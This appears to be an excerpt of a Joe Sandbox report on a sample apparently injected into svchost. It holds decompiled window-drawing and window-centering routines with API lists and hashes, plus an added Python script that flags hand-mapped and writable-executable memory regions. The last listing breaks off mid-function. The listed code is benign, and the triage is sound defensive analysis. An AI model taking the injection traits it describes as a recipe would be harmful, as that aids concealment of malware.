    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CriticalSection$wave$EnterHeaderLeave$CloseHandleUnprepare$DeleteMultipleObjectsPausePrepareReleaseResetSemaphoreWaitWrite
    • String ID:
    • API String ID: 361331667-0
    • Opcode ID: 22d3e0934b203717406250bcc7dc4c39d5b9e90db758ce7f4c3d82c6e0eeecbf
    • Instruction ID: b5bca92105ed07615b19db9e565a3ad56cefb1ab61dc4afcaa232daabe60f20b
    • Opcode Fuzzy Hash: 22d3e0934b203717406250bcc7dc4c39d5b9e90db758ce7f4c3d82c6e0eeecbf
    • Instruction Fuzzy Hash: 5F719E75A00219ABDB14DF68ED88AAB77A9FF4C704F04846AFD06D7350C678ED01CB99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			E00438210(void* __ecx) {
    				void* __ebp;
    				struct HBRUSH__* _t95;
    				int _t102;
    				int _t103;
    				signed int _t106;
    				long _t120;
    				intOrPtr _t122;
    				void* _t131;
    				intOrPtr _t143;
    				intOrPtr _t148;
    				intOrPtr _t159;
    				int _t160;
    				intOrPtr _t165;
    				void* _t218;
    				intOrPtr* _t225;
    				int _t229;
    				signed int _t233;
    				intOrPtr _t237;
    				void* _t238;
    
    				_push(0xffffffff);
    				_push(E0048FF20);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t237;
    				_t238 = _t237 - 0x38;
    				_t159 =  *((intOrPtr*)(_t238 + 0x4c));
    				_t218 = __ecx;
    				_push( *((intOrPtr*)(_t159 + 0x18)));
    				_t225 = E00489369();
    				CopyRect(_t238 + 0x28, _t159 + 0x1c);
    				_t165 =  *0x4b8924; // 0x4b8938
    				 *(_t238 + 0x10) =  *(_t159 + 0x10);
    				 *((intOrPtr*)(_t238 + 0x58)) = _t165;
    				_push(0xffffff);
    				 *((intOrPtr*)(_t238 + 0x54)) = 0;
    				_t95 = E00489F7B(_t238 + 0x24);
    				if(_t95 != 0) {
    					_t95 =  *(_t95 + 4);
    				}
    				FillRect( *(_t225 + 4), _t238 + 0x2c, _t95);
    				 *((intOrPtr*)(_t238 + 0x20)) = 0x497168;
    				_t14 = _t238 + 0x20; // 0x497168
    				 *(_t238 + 0x50) = 1;
    				E00489F15(_t14);
    				 *((char*)(_t238 + 0x54)) = 0;
    				_t160 = GetSystemMetrics(0x2e);
    				_t229 = GetSystemMetrics(0x2d);
    				 *((intOrPtr*)(_t238 + 0x14)) = _t229;
    				if( *((intOrPtr*)(_t218 + 0x3c)) != 0) {
    					 *(_t238 + 0x10) =  *(_t238 + 0x10) | 0x00000001;
    				}
    				_t102 =  *(_t238 + 0x30);
    				 *(_t238 + 0x40) = _t102;
    				_t103 = _t102 - _t229;
    				 *(_t238 + 0x40) = _t103;
    				 *(_t238 + 0x38) =  *(_t238 + 0x28);
    				 *(_t238 + 0x38) = _t103 -  *((intOrPtr*)(_t218 + 0x58)) +  *((intOrPtr*)(_t218 + 0x50));
    				_t106 =  *(_t238 + 0x10);
    				_t233 = _t106 & 0x00000004;
    				 *((intOrPtr*)(_t238 + 0x44)) =  *(_t238 + 0x34) - _t160;
    				 *(_t238 + 0x3c) =  *(_t238 + 0x2c) + _t160;
    				DrawFrameControl( *(_t225 + 4), _t238 + 0x3c, 3, ((_t106 & 0x00000001) << 0x00000003 | _t233) << 0x00000006 | 0x00000001);
    				DrawEdge( *(_t225 + 4), _t238 + 0x2c, 0xa, 0xf);
    				_t39 = _t160 + 1; // 0x1
    				InflateRect(_t238 + 0x28,  ~( *((intOrPtr*)(_t238 + 0x14)) + 2),  ~_t39);
    				 *(_t238 + 0x30) =  *(_t238 + 0x30) +  *((intOrPtr*)(_t218 + 0x50)) -  *((intOrPtr*)(_t218 + 0x58));
    				if(_t233 == 0) {
    					_t120 =  *(_t218 + 0x44);
    					if(_t120 == 0xff000000) {
    						_t120 = 0xffffff;
    					}
    				} else {
    					_t120 = GetSysColor(0xf);
    				}
    				E00489F7B(_t238 + 0x1c);
    				 *(_t238 + 0x50) = 2;
    				_t122 = E00489512(_t225, _t238 + 0x18);
    				 *((intOrPtr*)(_t238 + 0x18)) = _t122;
    				 *((intOrPtr*)( *_t225 + 0x24))(7, _t120);
    				Rectangle( *(_t225 + 4),  *(_t238 + 0x2c),  *(_t238 + 0x2c),  *(_t238 + 0x30),  *(_t238 + 0x34));
    				E00489512(_t225,  *((intOrPtr*)(_t238 + 0x14)));
    				if( *(_t218 + 0x44) != 0xff000000) {
    					E0048564F(_t218, _t238 + 0x58);
    				} else {
    					E004833AF(_t238 + 0x58, _t233, _t218 + 0x60);
    				}
    				if( *((intOrPtr*)( *((intOrPtr*)(_t238 + 0x58)) - 8)) != 0) {
    					 *((intOrPtr*)( *_t225 + 0x24))(0x11);
    					E004895EE(_t225, 1);
    					if(_t233 == 0) {
    						asm("sbb eax, eax");
    						 *((intOrPtr*)( *_t225 + 0x30))( ~( *(_t218 + 0x48) - 0xff000000) &  *(_t218 + 0x48));
    					} else {
    						OffsetRect(_t238 + 0x2c, 1, 1);
    						 *((intOrPtr*)( *_t225 + 0x30))(GetSysColor(0x14));
    						_t148 =  *((intOrPtr*)(_t238 + 0x58));
    						 *((intOrPtr*)( *_t225 + 0x68))(_t148,  *((intOrPtr*)(_t148 - 8)), _t238 + 0x28, 0x25);
    						OffsetRect(_t238 + 0x2c, 0xffffffff, 0xffffffff);
    						 *((intOrPtr*)( *_t225 + 0x30))(GetSysColor(0x10));
    					}
    					_t143 =  *((intOrPtr*)(_t238 + 0x58));
    					 *((intOrPtr*)( *_t225 + 0x68))(_t143,  *((intOrPtr*)(_t143 - 8)), _t238 + 0x28, 0x25);
    				}
    				if(( *(_t238 + 0x10) & 0x00000010) != 0) {
    					InflateRect(_t238 + 0x2c, 0xffffffff, 0xffffffff);
    					DrawFocusRect( *(_t225 + 4), _t238 + 0x28);
    				}
    				 *((intOrPtr*)(_t238 + 0x18)) = 0x497168;
    				 *(_t238 + 0x50) = 3;
    				E00489F15(_t238 + 0x18);
    				 *(_t238 + 0x50) = 0xffffffff;
    				_t131 = E004832C2(_t238 + 0x58);
    				 *[fs:0x0] =  *((intOrPtr*)(_t238 + 0x48));
    				return _t131;
    			}

    Instruction addresses for the listing above (the per-line address column, detached from the C code by extraction): 0x00438210 through 0x00438500.

    APIs
    • CopyRect.USER32(?,?), ref: 00438246
      • Part of subcall function 00489F7B: __EH_prolog.LIBCMT ref: 00489F80
      • Part of subcall function 00489F7B: CreateSolidBrush.GDI32(?), ref: 00489F9D
    • FillRect.USER32(?,?,00000000), ref: 00438284
    • GetSystemMetrics.USER32(0000002E), ref: 004382AD
    • GetSystemMetrics.USER32(0000002D), ref: 004382B3
    • DrawFrameControl.USER32(?,?,00000003,?), ref: 00438326
    • DrawEdge.USER32(?,?,0000000A,0000000F), ref: 00438339
    • InflateRect.USER32(?,00FFFFFD,00000001), ref: 00438354
    • GetSysColor.USER32(0000000F), ref: 00438378
    • Rectangle.GDI32(?,?,?,?,?), ref: 004383CB
    • OffsetRect.USER32(?,00000001,00000001), ref: 00438435
    • GetSysColor.USER32(00000014), ref: 0043843B
    • OffsetRect.USER32(?,000000FF,000000FF), ref: 00438463
    • GetSysColor.USER32(00000010), ref: 00438469
    • InflateRect.USER32(?,000000FF,000000FF), ref: 004384B2
    • DrawFocusRect.USER32(?,?), ref: 004384C1
      • Part of subcall function 0048564F: GetWindowTextLengthA.USER32(?), ref: 0048565C
      • Part of subcall function 0048564F: GetWindowTextA.USER32(?,00000000,00000000), ref: 00485674
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Rect$ColorDraw$InflateMetricsOffsetSystemTextWindow$BrushControlCopyCreateEdgeFillFocusFrameH_prologLengthRectangleSolid
    • String ID: hqI
    • API String ID: 4239342997-2158096905
    • Opcode ID: 74bbd221c701ee7368747ba6ce0b8125a603a61c5fe4ce1ade9de047dd7b2f1a
    • Instruction ID: 57e8d6adbbf3c6aeb42da2aafdb645f0194615487eb68c55ad32766f8a14089c
    • Opcode Fuzzy Hash: 74bbd221c701ee7368747ba6ce0b8125a603a61c5fe4ce1ade9de047dd7b2f1a
    • Instruction Fuzzy Hash: 85A16870208745AFC704DF64C888A6BFBE8BF98714F004A2DF69587390DBB4E905CB96
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			E00486B88(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
    				signed int _v5;
    				intOrPtr _v8;
    				intOrPtr _v12;
    				struct tagRECT _v28;
    				struct tagRECT _v44;
    				struct tagRECT _v60;
    				struct tagRECT _v80;
    				char _v100;
    				intOrPtr _t55;
    				struct HWND__* _t56;
    				intOrPtr _t78;
    				intOrPtr _t90;
    				signed int _t99;
    				struct HWND__* _t100;
    				struct HWND__* _t102;
    				void* _t104;
    				long _t110;
    				void* _t113;
    				struct HWND__* _t115;
    				void* _t117;
    				intOrPtr _t119;
    				intOrPtr _t123;
    
    				_t113 = __edx;
    				_t119 = __ecx;
    				_v12 = __ecx;
    				_v8 = E004874EA(__ecx);
    				_t55 = _a4;
    				if(_t55 == 0) {
    					if((_v5 & 0x00000040) == 0) {
    						_t56 = GetWindow( *(__ecx + 0x1c), 4);
    					} else {
    						_t56 = GetParent( *(__ecx + 0x1c));
    					}
    					_t115 = _t56;
    					if(_t115 != 0) {
    						_t100 = SendMessageA(_t115, 0x36b, 0, 0);
    						if(_t100 != 0) {
    							_t115 = _t100;
    						}
    					}
    				} else {
    					_t115 =  *(_t55 + 0x1c);
    				}
    				GetWindowRect( *(_t119 + 0x1c),  &_v44);
    				if((_v5 & 0x00000040) != 0) {
    					_t102 = GetParent( *(_t119 + 0x1c));
    					GetClientRect(_t102,  &_v28);
    					GetClientRect(_t115,  &_v60);
    					MapWindowPoints(_t115, _t102,  &_v60, 2);
    				} else {
    					if(_t115 != 0) {
    						_t99 = GetWindowLongA(_t115, 0xfffffff0);
    						if((_t99 & 0x10000000) == 0 || (_t99 & 0x20000000) != 0) {
    							_t115 = 0;
    						}
    					}
    					_v100 = 0x28;
    					if(_t115 != 0) {
    						GetWindowRect(_t115,  &_v60);
    						E0046F9E2(E0046F977(_t115, 2),  &_v100);
    						CopyRect( &_v28,  &_v80);
    					} else {
    						_t90 = E0046F80D();
    						if(_t90 != 0) {
    							_t90 =  *((intOrPtr*)(_t90 + 0x1c));
    						}
    						E0046F9E2(E0046F977(_t90, 1),  &_v100);
    						CopyRect( &_v60,  &_v80);
    						CopyRect( &_v28,  &_v80);
    					}
    				}
    				_t117 = _v44.right - _v44.left;
    				asm("cdq");
    				_t104 = _v44.bottom - _v44.top;
    				asm("cdq");
    				_t114 = _v60.bottom;
    				_t110 = (_v60.left + _v60.right - _t113 >> 1) - (_t117 - _t113 >> 1);
    				asm("cdq");
    				asm("cdq");
    				_t123 = (_v60.top + _v60.bottom - _v60.bottom >> 1) - (_t104 - _t114 >> 1);
    				if(_t110 >= _v28.left) {
    					_t78 = _v28.right;
    					if(_t117 + _t110 > _t78) {
    						_t110 = _t78 - _v44.right + _v44.left;
    					}
    				} else {
    					_t110 = _v28.left;
    				}
    				if(_t123 >= _v28.top) {
    					if(_t104 + _t123 > _v28.bottom) {
    						_t123 = _v44.top - _v44.bottom + _v28.bottom;
    					}
    				} else {
    					_t123 = _v28.top;
    				}
    				return E004875D2(_v12, 0, _t110, _t123, 0xffffffff, 0xffffffff, 0x15);
    			}

    Instruction addresses for the listing above (the per-line address column, detached from the C code by extraction): 0x00486b88 through 0x00486d3a.

    APIs
      • Part of subcall function 004874EA: GetWindowLongA.USER32(?,000000F0), ref: 004874F6
    • GetParent.USER32(?), ref: 00486BB3
    • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 00486BD6
    • GetWindowRect.USER32(?,?), ref: 00486BEF
    • GetWindowLongA.USER32(00000000,000000F0), ref: 00486C02
    • CopyRect.USER32(?,?), ref: 00486C4F
    • CopyRect.USER32(?,?), ref: 00486C59
    • GetWindowRect.USER32(00000000,?), ref: 00486C62
      • Part of subcall function 0046F977: MonitorFromWindow.USER32(?,?), ref: 0046F98C
      • Part of subcall function 0046F9E2: GetMonitorInfoA.USER32(?,?), ref: 0046F9F9
    • CopyRect.USER32(?,?), ref: 00486C7E
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: RectWindow$Copy$LongMonitor$FromInfoMessageParentSend
    • String ID: ($@
    • API String ID: 1450647913-1311469180
    • Opcode ID: 9cbdb6971d5052a1847bdbe635844745fa8e2c0921d88da5ea7342e70562269f
    • Instruction ID: 8ea4aeb4195a7b8c1307846fff314cb44b9fff1c7ddc8bb076b343c021f2e50c
    • Opcode Fuzzy Hash: 9cbdb6971d5052a1847bdbe635844745fa8e2c0921d88da5ea7342e70562269f
    • Instruction Fuzzy Hash: FD519272A00219AFCF10EBA8DD85EEEBBB9EF44314F154526E901F7280D674ED058B68
    Uniqueness

    Uniqueness Score: -1.00%
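
    The memory-dump identifiers listed above carry the region base, a page-protection value and a region-type value for each dumped block of the PE that the snapshot file name places at 0x400000 inside svchost. The script below is an added example, not part of the Joe Sandbox report: it decodes those identifiers with the winnt.h PAGE_* and MEM_* constants and flags what a responder checks first, a PE header sitting in MEM_PRIVATE rather than MEM_IMAGE memory (not loaded by the OS loader) and any region that is both writable and executable. The field layout assumed for the .sdmp name (pid index, snapshot, serial, base, protect, unknown, type, unknown) is an assumption drawn from the values on this page, not documented Joe Sandbox behaviour; the names `Region`, `parse_sdmp_name` and `triage` are this example's own.

```python
"""Decode the .sdmp region names from the report and flag suspicious regions.

Added example. The dump names below are copied from the page; the field
layout assumed by SDMP_RE is an assumption, not documented Joe Sandbox
behaviour. PAGE_* and MEM_* values are the winnt.h constants.
"""
import re
from dataclasses import dataclass

# winnt.h page-protection constants (low byte of MEMORY_BASIC_INFORMATION.Protect)
PAGE_NOACCESS = 0x01
PAGE_READONLY = 0x02
PAGE_READWRITE = 0x04
PAGE_WRITECOPY = 0x08
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
PROTECT_NAMES = {
    PAGE_NOACCESS: "PAGE_NOACCESS", PAGE_READONLY: "PAGE_READONLY",
    PAGE_READWRITE: "PAGE_READWRITE", PAGE_WRITECOPY: "PAGE_WRITECOPY",
    PAGE_EXECUTE: "PAGE_EXECUTE", PAGE_EXECUTE_READ: "PAGE_EXECUTE_READ",
    PAGE_EXECUTE_READWRITE: "PAGE_EXECUTE_READWRITE",
    PAGE_EXECUTE_WRITECOPY: "PAGE_EXECUTE_WRITECOPY",
}
# winnt.h region types (MEMORY_BASIC_INFORMATION.Type)
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x20000, 0x40000, 0x1000000
TYPE_NAMES = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

# Assumed .sdmp name layout: pid.snapshot.serial.base.protect.field5.type.field7.sdmp
SDMP_RE = re.compile(
    r"^(?P<pid>\d{8})\.(?P<snap>\d{8})\.(?P<serial>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<f5>[0-9A-Fa-f]{8})\.(?P<type>[0-9A-Fa-f]{8})\.(?P<f7>[0-9A-Fa-f]{8})\.sdmp$"
)

# Dump names copied from the report (source file first, then the associated dumps).
SAMPLE_DUMPS = [
    "00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp",
    "00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp",
    "00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp",
    "00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp",
    "00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp",
    "00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp",
    "00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp",
    "00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp",
    "00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp",
    "00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp",
    "00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp",
    "00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp",
]


@dataclass(frozen=True)
class Region:
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        # Mask off modifier bits (PAGE_GUARD, PAGE_NOCACHE, ...) before the lookup.
        return PROTECT_NAMES.get(self.protect & 0xFF, hex(self.protect))

    @property
    def writable_and_executable(self) -> bool:
        return (self.protect & 0xFF) in (PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY)


def parse_sdmp_name(name: str) -> Region:
    """Extract base, protection and region type from one .sdmp file name."""
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name!r}")
    return Region(int(m["base"], 16), int(m["protect"], 16), int(m["type"], 16))


def triage(names, image_base: int):
    """Return human-readable findings for a PE reported at image_base."""
    findings = []
    for r in (parse_sdmp_name(n) for n in names):
        if r.base == image_base and r.mem_type != MEM_IMAGE:
            # A loader-mapped module is MEM_IMAGE; anything else was written in by hand.
            findings.append(
                f"PE header at {r.base:#x} is {TYPE_NAMES.get(r.mem_type, hex(r.mem_type))}, "
                "not MEM_IMAGE: image was not loaded by the OS loader (manual map / injection)"
            )
        if r.writable_and_executable:
            findings.append(f"region {r.base:#x} is {r.protect_name} (W+X)")
    return findings


if __name__ == "__main__":
    for line in triage(SAMPLE_DUMPS, 0x400000):
        print(line)
```

    Run against the twelve names on this page it reports the 0x400000 header as MEM_PRIVATE and nine PAGE_EXECUTE_READWRITE regions from 0x4A9000 upward; the read-only 0x492000 block and the PAGE_EXECUTE_READ code block at 0x401000 are left alone, which is the split you would expect from a hand-mapped image whose data sections were written after mapping.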

    C-Code - Quality: 87%
    			E0041C360(intOrPtr __ecx, intOrPtr __fp0) {
    				int __ebp;
    				intOrPtr _t126;
    				void* _t129;
    				void* _t130;
    				void* _t139;
    				intOrPtr _t158;
    				intOrPtr _t180;
    				signed int _t186;
    				struct HBRUSH__* _t190;
    				intOrPtr _t202;
    				void* _t203;
    				intOrPtr _t215;
    
    				_t215 = __fp0;
    				_push(0xffffffff);
    				_push(E0048E978);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t202;
    				_t203 = _t202 - 0x68;
    				_t158 = __ecx;
    				_t190 = 0;
    				 *((intOrPtr*)(_t203 + 0x14)) = __ecx;
    				 *(_t203 + 0x3c) = 0;
    				 *(_t203 + 0x38) = 0x49637c;
    				_t200 =  *(_t203 + 0x8c);
    				 *((intOrPtr*)(_t203 + 0x80)) = 0;
    				E00489EBE(_t203 + 0x3c, CreateRectRgn( *( *(_t203 + 0x8c)), ( *(_t203 + 0x8c))[1], ( *(_t203 + 0x8c))[2], _t200[3]));
    				_t126 =  *((intOrPtr*)(_t158 + 0x5c));
    				if(_t126 != 0) {
    					if( *((intOrPtr*)(_t158 + 0xec)) == 0) {
    						if(_t126 != 0) {
    							_t180 =  *((intOrPtr*)(_t158 + 0x54));
    						} else {
    							_t180 = 0;
    						}
    						 *((intOrPtr*)(_t158 + 0xec)) = E00425870(_t200, _t180, _t126);
    					}
    					 *(_t203 + 0x64) = _t190;
    					 *(_t203 + 0x60) = _t190;
    					 *(_t203 + 0x70) = _t190;
    					 *(_t203 + 0x74) = _t190;
    					 *(_t203 + 0x68) = _t190;
    					 *(_t203 + 0x6c) = _t190;
    					if( *((intOrPtr*)(_t158 + 0xec)) != _t190) {
    						_t139 = E0040C100( *((intOrPtr*)(_t158 + 0x48)));
    						_t203 = _t203 + 4;
    						if(E00425950(_t215,  *(_t203 + 0x8c),  *((intOrPtr*)(_t158 + 0xec)), _t203 + 0x60, _t139) == 1) {
    							GetClientRect( *(_t158 + 0x1c), _t203 + 0x40);
    							_t186 =  *(_t158 + 0x60);
    							 *(_t203 + 0x8c) =  *((intOrPtr*)(_t203 + 0x48)) -  *(_t203 + 0x40);
    							 *((intOrPtr*)(_t203 + 0x10)) =  *((intOrPtr*)(_t203 + 0x4c)) -  *((intOrPtr*)(_t203 + 0x44));
    							if(_t186 > 3) {
    								L30:
    								_t190 = 0;
    							} else {
    								switch( *((intOrPtr*)(_t186 * 4 +  &M0041C7E4))) {
    									case 0:
    										_t190 = 0;
    										E00425D90(_t172, _t203 + 0x70, 0, 0, 0xffffffff, 0xffffffff, 0xcc0020);
    										 *(_t203 + 0x2c) = 0;
    										 *(_t203 + 0x28) = 0x49637c;
    										 *((char*)(_t203 + 0x90)) = 1;
    										E00489EBE(_t203 + 0x2c, CreateRectRgn(0, 0,  *(_t203 + 0x68),  *(_t203 + 0x6c)));
    										_t44 = _t203 + 0x28; // 0x49637c
    										asm("sbb eax, eax");
    										asm("sbb ecx, ecx");
    										CombineRgn( *(_t203 + 0x3c),  ~(_t203 + 0x38) &  *(_t203 + 0x3c),  ~_t44 &  *(_t203 + 0x2c), 4);
    										 *(_t203 + 0x28) = 0x496388;
    										 *((char*)(_t203 + 0x80)) = 2;
    										E00489F15(_t203 + 0x28);
    										 *((char*)(_t203 + 0x80)) = 0;
    										goto L31;
    									case 1:
    										__edi = 0;
    										if(__ecx > 0) {
    											__ebx =  *0x49247c;
    											__ecx =  *(__esp + 0x68);
    											do {
    												__edi = 0;
    												if(__eax > 0) {
    													do {
    														__eax =  *(__esp + 0x6c);
    														__ecx = __ecx + __edi;
    														__eax =  *(__esp + 0x6c) + __esi;
    														__ecx = __esp + 0x5c;
    														__eax = SetRect(__esp + 0x5c, __edi, __esi, __esp + 0x5c,  *(__esp + 0x6c) + __esi);
    														__edx = __esp + 0x50;
    														__esp + 0x2c = IntersectRect(__esp + 0x2c, __esp + 0x50, __ebp);
    														__edx =  *(__esp + 0x2c);
    														__ecx =  *(__esp + 0x28);
    														__eax =  *(__esp + 0x30);
    														 *(__esp + 0x1c) =  *(__esp + 0x2c);
    														 *(__esp + 0x18) =  *(__esp + 0x28);
    														__ecx =  *(__esp + 0x34);
    														__edx = __esp + 0x18;
    														 *(__esp + 0x20) =  *(__esp + 0x30);
    														 *(__esp + 0x28) = __ecx;
    														if(IsRectEmpty(__esp + 0x18) == 0) {
    															__esp + 0x70 = E00425D90(__ecx, __esp + 0x70, __edi, __esi, 0xffffffff, 0xffffffff, 0xcc0020);
    														}
    														__ecx =  *(__esp + 0x68);
    														__eax =  *(__esp + 0x8c);
    														__edi = __ecx + __edi;
    													} while (__edi < __eax);
    												}
    												__edi =  *(__esp + 0x6c);
    												__edx =  *(__esp + 0x10);
    												__esi = __esi +  *(__esp + 0x6c);
    											} while (__esi <  *(__esp + 0x10));
    											__ebx =  *(__esp + 0x14);
    											__edi = 0;
    										}
    										__ecx = __esp + 0x38;
    										__eax = E00489F15(__ecx);
    										goto L31;
    									case 2:
    										__ecx =  *(__ebx + 0xec);
    										__ebp =  *(__ecx + 4);
    										 *(__esp + 0x18) = __ebp;
    										__ebx =  *(__ecx + 8);
    										 *(__esp + 0x28) = __ebx;
    										if(__ebp <= __eax) {
    											__eax = __eax - __ebp;
    											 *(__esp + 0x8c) = __ebp;
    											asm("cdq");
    											__edi = __eax;
    											__eax = __ebp;
    											__edi = __edi >> 1;
    										}
    										__ecx =  *(__esp + 0x10);
    										if(__ebx <= __ecx) {
    											__eax = __ecx;
    											 *(__esp + 0x10) = __ebx;
    											__eax = __ecx - __ebx;
    											asm("cdq");
    											__eax = __ecx - __ebx - __edx;
    											__esi = __ecx - __ebx - __edx;
    											__eax =  *(__esp + 0x8c);
    											__esi = __ecx - __ebx - __edx >> 1;
    										}
    										if(__ebp > __eax || __ebx >  *(__esp + 0x10)) {
    											asm("fild dword [esp+0x18]");
    											asm("fild dword [esp+0x8c]");
    											__fp0 = __fp0 / st1;
    											asm("fild dword [esp+0x28]");
    											asm("fst qword [esp+0x18]");
    											asm("fild dword [esp+0x10]");
    											__fp0 = __fp0 / st1;
    											 *(__esp + 0x28) = __fp0;
    											st0 = __fp0;
    											asm("fcom qword [esp+0x28]");
    											asm("fnstsw ax");
    											if((__ah & 0x00000001) == 0) {
    												st0 = __fp0;
    												__fp0 =  *(__esp + 0x28);
    											}
    											asm("fxch st0, st1");
    											__fp0 = __fp0 * st1;
    											__eax = E00470388();
    											__fp0 =  *(__esp + 0x18);
    											__fp0 =  *(__esp + 0x18) * st1;
    											__ebp = __eax;
    											__ebx = E00470388();
    											 *(__esp + 0x8c) =  *(__esp + 0x8c) - __ebp;
    											asm("cdq");
    											st0 = __fp0;
    											 *(__esp + 0x8c) - __ebp - __edx =  *(__esp + 0x8c) - __ebp - __edx >> 1;
    											__edi = __edi + ( *(__esp + 0x8c) - __ebp - __edx >> 1);
    											 *(__esp + 0x10) =  *(__esp + 0x10) - __ebx;
    											asm("cdq");
    											 *(__esp + 0x10) - __ebx - __edx =  *(__esp + 0x10) - __ebx - __edx >> 1;
    											__esi = __esi + ( *(__esp + 0x10) - __ebx - __edx >> 1);
    										}
    										__ecx = __esp + 0x70;
    										__eax = E00425D90(__esp + 0x70, __esp + 0x70, __edi, __esi, __ebp, __ebx, 0xcc0020);
    										 *(__esp + 0x2c) = 0;
    										 *(__esp + 0x28) = 0x49637c;
    										__ebx = __ebx + __esi;
    										__ebp = __ebp + __edi;
    										 *((char*)(__esp + 0x90)) = 3;
    										__eax = CreateRectRgn(__edi, __esi, __ebp, __ebx);
    										__ecx = __esp + 0x2c;
    										__eax = E00489EBE(__esp + 0x2c, __eax);
    										__esi =  *(__esp + 0x2c);
    										_t95 = __esp + 0x28; // 0x49637c
    										__eax = _t95;
    										__edx =  *(__esp + 0x3c);
    										__ecx = __esp + 0x38;
    										__eax =  ~_t95;
    										asm("sbb eax, eax");
    										__eax =  ~_t95 & __esi;
    										__ecx =  ~(__esp + 0x38);
    										asm("sbb ecx, ecx");
    										__ecx =  ~(__esp + 0x38) & __edx;
    										__eax = CombineRgn(__edx,  ~(__esp + 0x38) & __edx,  ~_t95 & __esi, 4);
